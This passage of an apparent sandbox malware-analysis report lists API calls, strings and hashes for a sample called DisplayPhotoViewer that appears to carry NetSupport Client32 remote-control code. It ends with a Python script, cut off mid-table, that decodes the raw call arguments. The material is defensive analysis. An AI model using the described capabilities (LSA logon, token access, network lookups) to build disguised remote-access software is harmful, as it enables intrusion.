                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ItemText
                                                                                                    • String ID: %02d:%02d$%d:%02d:%02d$AckDlgTimeoutAccept$Client$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 3736328045-931665787
                                                                                                    • Opcode ID: 32ce343acb54bc761c1be489ed33dad1110b6177ab4317886434216ca3f82ce1
                                                                                                    • Instruction ID: fddd4b7449233392fe5952f74f27d384eaa1ddbcc2dc021834a8ed1e10f2bc7a
                                                                                                    • Opcode Fuzzy Hash: 32ce343acb54bc761c1be489ed33dad1110b6177ab4317886434216ca3f82ce1
                                                                                                    • Instruction Fuzzy Hash: BB410775E10619ABDB14DBA4CC85FEEB7B5FB84718F004229E816A7281FA30B905CB91
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 111532CA
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 111532E9
                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,?,0B2326C8), ref: 111532FF
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,0002000B,?), ref: 1115332C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1115334E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$OpenWindow$CloseFindHandleThreadToken
                                                                                                    • String ID: *ShellWndClass$..\ctl32\WMM.CPP$Client$Progman$hProcess
                                                                                                    • API String ID: 2107570828-3172847105
                                                                                                    • Opcode ID: 9c6e822064248c38b6bb245f484d99e01b5fad97a2eff947b5722baa29d120f0
                                                                                                    • Instruction ID: 8751a0780d8dcbc12aaceb1720da0bb874bc767e61fb731b8c025e855cc0987d
                                                                                                    • Opcode Fuzzy Hash: 9c6e822064248c38b6bb245f484d99e01b5fad97a2eff947b5722baa29d120f0
                                                                                                    • Instruction Fuzzy Hash: 3C219074B14618ABDB81DFA0DD85FEEF7B8EB48708F408059FD15A7284EB30A910C765
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Secur32.dll,?,11179C9B,110A7CA5,218EC38C,00000000,?,00000000), ref: 110A74E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,LsaRegisterLogonProcess), ref: 110A7501
                                                                                                    • GetProcAddress.KERNEL32(00000000,LsaLogonUser), ref: 110A750E
                                                                                                    • GetProcAddress.KERNEL32(?,LsaFreeReturnBuffer), ref: 110A751B
                                                                                                    • GetProcAddress.KERNEL32(?,LsaLookupAuthenticationPackage), ref: 110A7528
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: LsaFreeReturnBuffer$LsaLogonUser$LsaLookupAuthenticationPackage$LsaRegisterLogonProcess$Secur32.dll
                                                                                                    • API String ID: 2238633743-4075821787
                                                                                                    • Opcode ID: 53222920044594163debc0ab317fffd86b8f6d2aa07e119cf56005ca3d81ea3f
                                                                                                    • Instruction ID: 2f611636caa2edd968ff3169624b98a915870241ca66a1e28c8aed72611994d7
                                                                                                    • Opcode Fuzzy Hash: 53222920044594163debc0ab317fffd86b8f6d2aa07e119cf56005ca3d81ea3f
                                                                                                    • Instruction Fuzzy Hash: 90F062B1A007149FC730AF6BDC44D5AFBE8BF946103518D1FE4A6D3668D6B4A4418F54
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(000001F4,000000D0,11044570,00000000), ref: 1102B294
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: *channel$CLIENT32.CPP$Client$Eval$IsA()$SetChannel(%s), oldchan=<%s>$_License$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$gMain.cfg == m_cfg$licensee
                                                                                                    • API String ID: 3472027048-3511930441
                                                                                                    • Opcode ID: e4171e01cbb41f55865f6996c616d49d5ed2212dd8b988d2df533028ab213449
                                                                                                    • Instruction ID: 0abde7a7f891eee350a2c1237c0acb8ed14f815d25f3eebdf77b10db9a3c403a
                                                                                                    • Opcode Fuzzy Hash: e4171e01cbb41f55865f6996c616d49d5ed2212dd8b988d2df533028ab213449
                                                                                                    • Instruction Fuzzy Hash: A8716138E0061BABDB04DBE5DC50FEEF7B5AF95708F508158E92567280EB707905CB61
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 1103F9FB
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,0006029E,?,00000002,00002710,?), ref: 1103FBF0
                                                                                                    • _free.LIBCMT ref: 1103FBF7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                                    • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                                                                    • API String ID: 1897251511-2508660115
                                                                                                    • Opcode ID: 05be87f0668f383673c5ea41fad6aed4ab4e66b80e1e4536e447f22e00de72a5
                                                                                                    • Instruction ID: 325393943f12335c5e4e5f220104c331d2f41844f0190a8f10e6acaf3d6cd9b6
                                                                                                    • Opcode Fuzzy Hash: 05be87f0668f383673c5ea41fad6aed4ab4e66b80e1e4536e447f22e00de72a5
                                                                                                    • Instruction Fuzzy Hash: C6719DB5E1061A9FDB04CFD5CC80EEEF7B5AF88305F10816DE955A7284E770A906CB92
                                                                                                    APIs
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,218EC38C,00000000,?), ref: 11151497
                                                                                                    • CoCreateInstance.OLE32(111B8ADC,00000000,00000017,111B8A0C,?), ref: 111514B7
                                                                                                    • wsprintfW.USER32 ref: 111514D7
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 111514E3
                                                                                                    • wsprintfW.USER32 ref: 11151597
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 11151638
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                    • API String ID: 3050498177-823534439
                                                                                                    • Opcode ID: 5b6a006cfdc6b437111f67b21c6f49fa06bbdb6d8cd3c592a934d301938bc6c9
                                                                                                    • Instruction ID: 0cf9d1d24786640cc68b733bed4ae13531d68a6f3d23fdcde8e95de2130a07a5
                                                                                                    • Opcode Fuzzy Hash: 5b6a006cfdc6b437111f67b21c6f49fa06bbdb6d8cd3c592a934d301938bc6c9
                                                                                                    • Instruction Fuzzy Hash: 1251A171B40218AFC761CB69CC84F9AF7B8EB8A714F1442A9E819E7640DB70AE41CB51
                                                                                                    APIs
                                                                                                    • GetOverlappedResult.KERNEL32(?,218EC14C,FFFFFFFF,00000001), ref: 1100B70C
                                                                                                    • GetLastError.KERNEL32 ref: 1100B716
                                                                                                    • GetTickCount.KERNEL32 ref: 1100B779
                                                                                                    • wsprintfA.USER32 ref: 1100B7B6
                                                                                                    • ResetEvent.KERNEL32(?), ref: 1100B86F
                                                                                                    Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
• String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
• API String ID: 3598861413-432254317
• Opcode ID: af520caff937272eb15d7a4932dc547efb0ebbbeb8388e77e2d8af9d60cd4234
• Instruction ID: 35eca0ba24291c0ef887293c51a6740232971be1b7f9cf870343342f3d4057c9
• Opcode Fuzzy Hash: af520caff937272eb15d7a4932dc547efb0ebbbeb8388e77e2d8af9d60cd4234
• Instruction Fuzzy Hash: E251F1B9900A16ABE710CF65CC84ABBB7F8FF44749F04851DF96992281E7347940C7A5
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11025313
  • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
  • Part of subcall function 110EEBE0: LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C,00000002,00000000,00000000), ref: 110EEC1F
  • Part of subcall function 110EEBE0: GetCurrentProcessId.KERNEL32 ref: 110EEC61
  • Part of subcall function 110EEBE0: GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110EEC6E
  • Part of subcall function 110EEBE0: FreeLibrary.KERNEL32(?), ref: 110EED0B
• wsprintfA.USER32 ref: 11025349
• wsprintfA.USER32 ref: 110253B5
• wsprintfA.USER32 ref: 110253ED
Strings
Yara matches
Similarity
• API ID: wsprintf$Library$AddressCurrentFileFreeLoadModuleNameProcProcess_strrchr
• String ID: %d.exe$TraceModuleName$_Debug$trace$tracefile
• API String ID: 3659486034-589725905
• Opcode ID: ce775b358349740f3ca80521c4ba594498a18f83eddb3421fabaf2e10f794c8f
• Instruction ID: 29647b7a3bfb1805975f820d1a93f4f7ccc676230129df492f27dcd346966d9d
• Opcode Fuzzy Hash: ce775b358349740f3ca80521c4ba594498a18f83eddb3421fabaf2e10f794c8f
• Instruction Fuzzy Hash: 30411B35F001195BCB01CF69ED81AFEF7E9DF8931DF4081A9ED4AD7280EA7199058791
APIs
• EnterCriticalSection.KERNEL32(?,218EC38C,00000000,00000000,74DF23A0,11055977,00000000,00000000), ref: 11055728
• LeaveCriticalSection.KERNEL32(?), ref: 1105584A
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
• RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 110557DD
• RegDeleteValueA.ADVAPI32(?,?), ref: 110557FD
• RegCloseKey.ADVAPI32(?), ref: 11055807
• SetEvent.KERNEL32(?), ref: 11055840
Strings
Yara matches
Similarity
• API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
• String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
• API String ID: 1302350719-2578778249
• Opcode ID: 834111dadae7a7909c8106d536f480ffdd72fbc195f0e71753fc9f600de3ba17
• Instruction ID: eff8933b09e146a54e55651f9814a20418f7653f0f2e0b37b093a0256d9fdb3b
• Opcode Fuzzy Hash: 834111dadae7a7909c8106d536f480ffdd72fbc195f0e71753fc9f600de3ba17
• Instruction Fuzzy Hash: B941F376E0061AEFC781CFA4DCC0AAEBBA5FB45714F108569ED25DB240E732E905CB90
APIs
• GetVersionExA.KERNEL32(111E4A50,75BF8400), ref: 1113B3B0
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1113B3EF
• _memset.LIBCMT ref: 1113B40D
  • Part of subcall function 11139370: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
• _strncpy.LIBCMT ref: 1113B4CF
  • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
• RegCloseKey.ADVAPI32(00000000), ref: 1113B4DF
Strings
Yara matches
Similarity
• API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
• String ID: CSDVersion$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
• API String ID: 3299820421-3310072378
• Opcode ID: dce2d10279435452cbdc46fb73c4f38affaae88b965e818eb0aa6c1d9eb7f86a
• Instruction ID: 179e5faa9f7bf6ee2b7192873a2362bff12b0175902a6d15064a4905d280dfd9
• Opcode Fuzzy Hash: dce2d10279435452cbdc46fb73c4f38affaae88b965e818eb0aa6c1d9eb7f86a
• Instruction Fuzzy Hash: 8F415C70E1025A9BDB61CFA0DD41BAEF7A5BBC132DF000068E81B96584F734AA44CB99
APIs
  • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
• PostMessageA.USER32(0000FFFF,0000C1F0,00000000,00000000), ref: 11049135
• PostMessageA.USER32(0006029E,0000048F,00000032,00000000), ref: 11049166
• PostMessageA.USER32(0006029E,00000483,00000000,00000000), ref: 11049178
• PostMessageA.USER32(0006029E,0000048F,000000C8,00000000), ref: 1104918C
• PostMessageA.USER32(0006029E,00000483,00000001,?), ref: 110491A3
• PostMessageA.USER32(0006029E,00000800,00000000,00000000), ref: 110491B4
Strings
Yara matches
Similarity
• API ID: MessagePost$__wcstoi64
• String ID: Client$UnloadMirrorOnEndView$V
• API String ID: 1802880851-3348770396
• Opcode ID: 0bdca05b332994eeb3c536bf901a0ab82a1e44d1fb44b8e6e0ba9670a0da9962
• Instruction ID: 571ea163b8d1066a636673f4c77c47fd5d3d2b550a205948b634962d692ba2bc
• Opcode Fuzzy Hash: 0bdca05b332994eeb3c536bf901a0ab82a1e44d1fb44b8e6e0ba9670a0da9962
• Instruction Fuzzy Hash: 9441E475B02221ABD611DBA0CC81FAEB7A9FF89B08F108166F61857284DB707900CBD5
APIs
• _memset.LIBCMT ref: 110F14E1
• GetOEMCP.KERNEL32(0BA6C1B8,DBCS,PhysicalFonts,874, 862,?,?,?), ref: 110F1521
  • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEC0
  • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEF0
• Sleep.KERNEL32(000000C8,?,?,?), ref: 110F1594
Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$Sleep_memset
                                                                                                    • String ID: 874, 862$Client$DBCS$PhysicalFonts$SendPhysicalFonts$h
                                                                                                    • API String ID: 3726282246-1113141960
                                                                                                    • Opcode ID: 77d2aecb9fa9b97934e023db63773808de1bc1eacc80edcd04c514e05b5be3d4
                                                                                                    • Instruction ID: 002dfb7bc2e952d089ecd9f38d70e7df896b0c6c9bfc8e21921cc2deb7eae6c7
                                                                                                    • Opcode Fuzzy Hash: 77d2aecb9fa9b97934e023db63773808de1bc1eacc80edcd04c514e05b5be3d4
                                                                                                    • Instruction Fuzzy Hash: C421D874E4021AAFDB51DBA4DC81FFAB7B4DB45708F0042A8F915D72C4EA31A954CB91
APIs
• CreateCompatibleDC.GDI32(00000000), ref: 11155414
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 1115543D
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 11155447
• GetDeviceCaps.GDI32(00000000,00000026), ref: 11155477
• GetDeviceCaps.GDI32(00000000,00000068), ref: 11155483
• CreatePalette.GDI32(111DEC88), ref: 1115549E
• DeleteDC.GDI32(00000000), ref: 111554AA
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CapsDevice$Create$CompatibleDeleteErrorExitLastMessagePaletteProcesswsprintf
• String ID: ..\ctl32\WPALETTE.C$hdc
• API String ID: 147420939-1500643223
• Opcode ID: ada1a3c2c8b7c32df664ea09b4888e3bf01d738551bb0bae54d135815dfebb68
• Instruction ID: 65b8cdd2d762fe6bf531c506537c6c5b4dc03d351ba7ffbff25fbb1bc70c0600
• Opcode Fuzzy Hash: ada1a3c2c8b7c32df664ea09b4888e3bf01d738551bb0bae54d135815dfebb68
• Instruction Fuzzy Hash: 6F01DD71A4363066EBA15B699C8DF8DFE65EB4631FF054431E920D6184DB765040CB51
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 110179C0
  • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
  • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
  • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C7E
• _memmove.LIBCMT ref: 11017A47
• _memmove.LIBCMT ref: 11017A6B
• _memmove.LIBCMT ref: 11017AA5
• _memmove.LIBCMT ref: 11017AC1
• std::exception::exception.LIBCMT ref: 11017B0B
• __CxxThrowException@8.LIBCMT ref: 11017B20
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
• Opcode ID: 793b90c0b0b580cdead7fee2d6302a10aa151a89893be38e46c4507fcc2018b3
• Instruction ID: 272ed01510383d5c1bd495e3242dc8a26c8ef96b7745876e3463912857a5344f
• Opcode Fuzzy Hash: 793b90c0b0b580cdead7fee2d6302a10aa151a89893be38e46c4507fcc2018b3
• Instruction Fuzzy Hash: 2141B776E00505ABDB44CEA8CC81AAEB7EAEFC4214F59C569DC15DB308FA74EA018790
APIs
  • Part of subcall function 110B24C0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B24E6
  • Part of subcall function 110B24C0: GetProcAddress.KERNEL32(00000000), ref: 110B24ED
  • Part of subcall function 110B24C0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B2503
• wsprintfA.USER32 ref: 1100967F
• wsprintfA.USER32 ref: 11009699
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009783
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
• String ID: %s%s.htm$.%u$ApprovedWebList$Store\
• API String ID: 559337438-1872371932
• Opcode ID: 1e79c462439c0550afdc4cf0f2438d6d2a3ac00161aa75a70227d734537a262f
• Instruction ID: 036c6595aed68349ad2b1db4cf8e96d10811a228d68a03215efde5e100bb1447
• Opcode Fuzzy Hash: 1e79c462439c0550afdc4cf0f2438d6d2a3ac00161aa75a70227d734537a262f
• Instruction Fuzzy Hash: 5551F631E0425E9FDB16CF68DC91BDABBE4AB4A344F0081E5D94DDB241FA309A44CBE0
APIs
  • Part of subcall function 110D7BA0: EnterCriticalSection.KERNEL32(111E0C5C,11017238,218EC38C,?,?,?,111C0108,1117BDB8,000000FF,?,11019202), ref: 110D7BA1
  • Part of subcall function 11010D50: _memmove.LIBCMT ref: 11010D8D
• shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D11D9
• closesocket.WSOCK32(?), ref: 110D11E3
• __CxxThrowException@8.LIBCMT ref: 110D1209
• _memset.LIBCMT ref: 110D125C
• gethostname.WSOCK32(?,00000200,0000005C,00000000,111E0BE8), ref: 110D1270
• gethostbyname.WSOCK32(?), ref: 110D12A1
• inet_ntoa.WSOCK32 ref: 110D12CC
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CriticalEnterException@8SectionThrow_memmove_memsetclosesocketgethostbynamegethostnameinet_ntoashutdown
• String ID: 127.0.0.1
• API String ID: 3213037012-3619153832
• Opcode ID: c2d9d80238a34a81907b30d8128e9743708a8453648ea7d928b5b644bf873253
• Instruction ID: b1c65a194cdb50525830e936a7434970eb1928dc3388b5017c8dcba46dfd53a0
• Opcode Fuzzy Hash: c2d9d80238a34a81907b30d8128e9743708a8453648ea7d928b5b644bf873253
• Instruction Fuzzy Hash: 5E51D8B5900358AFCB20DFA4DC84BDEFBB9FB48714F40466DE51697680DB74AA48CB90
APIs
• GetWindowRect.USER32(00000000,?), ref: 110C738D
• BeginDeferWindowPos.USER32(?), ref: 110C73AF
• GetWindowRect.USER32(?,?), ref: 110C73D9
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110C7406
• DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000017), ref: 110C7495
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
• EndDeferWindowPos.USER32(00000000), ref: 110C74B1
Strings
• m_hWnd, xrefs: 110C7378
• e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110C7373
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Window$Defer$Rect$BeginErrorExitLastMessagePointsProcesswsprintf
• String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
• API String ID: 553022447-1557312927
• Opcode ID: 36ebf96d56ef107ebef8ff79e2d63526ceee99fa97b2b2ae03fff31a59b45d2c
• Instruction ID: eecc1d5743466b242e0d1adc666891c8c4a4b6909e4b9010b9b3a738dd652962
• Opcode Fuzzy Hash: 36ebf96d56ef107ebef8ff79e2d63526ceee99fa97b2b2ae03fff31a59b45d2c
• Instruction Fuzzy Hash: F251D1B5D00A09AFCB10CFA9D985A9EFBF5BF88714F148259E855A7644C730B841CFA4
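The API listings above show raw hexadecimal arguments (for example 40000000 and 00000002 in the CreateFileA call, 00000026 in GetDeviceCaps, 00000017 in DeferWindowPos) that a reviewer has to translate by hand before the behaviour of each function is clear. The following script is an added example, not Joe Sandbox code and not part of the NetSupport client; it parses listing lines in the "• API.MODULE(args), ref: addr" form, decodes the arguments for a handful of APIs into the symbolic names from the Windows SDK headers, and emits two triage hints (runtime export resolution through GetProcAddress, and a CreateFile call that writes a file with CREATE_ALWAYS). The sample input is constructed from lines quoted in the listings above; the constant tables are an assumption limited to the APIs they name.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and decode the numeric
arguments the report leaves raw. Added example, not Joe Sandbox code; SAMPLE is
constructed from listing lines quoted in the report."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
• GetDeviceCaps.GDI32(00000000,00000026), ref: 11155477
• CreatePalette.GDI32(111DEC88), ref: 1115549E
  • Part of subcall function 110B24C0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B24E6
  • Part of subcall function 110B24C0: GetProcAddress.KERNEL32(00000000), ref: 110B24ED
• wsprintfA.USER32 ref: 1100967F
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009783
• shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D11D9
• DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000017), ref: 110C7495
"""

# One listing line: optional "Part of subcall function X:" prefix, API.MODULE, optional
# parenthesised argument list, and the "ref:" call-site address.
LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[^\s(]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$"
)

# Constant tables; values as defined in the Windows SDK headers.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x04: "FILE_ATTRIBUTE_SYSTEM",
             0x80: "FILE_ATTRIBUTE_NORMAL", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
DEVCAPS = {0x0C: "BITSPIXEL", 0x0E: "PLANES", 0x26: "RASTERCAPS", 0x68: "SIZEPALETTE"}
SD_HOW = {0: "SD_RECEIVE", 1: "SD_SEND", 2: "SD_BOTH"}
SWP = {0x01: "SWP_NOSIZE", 0x02: "SWP_NOMOVE", 0x04: "SWP_NOZORDER", 0x08: "SWP_NOREDRAW",
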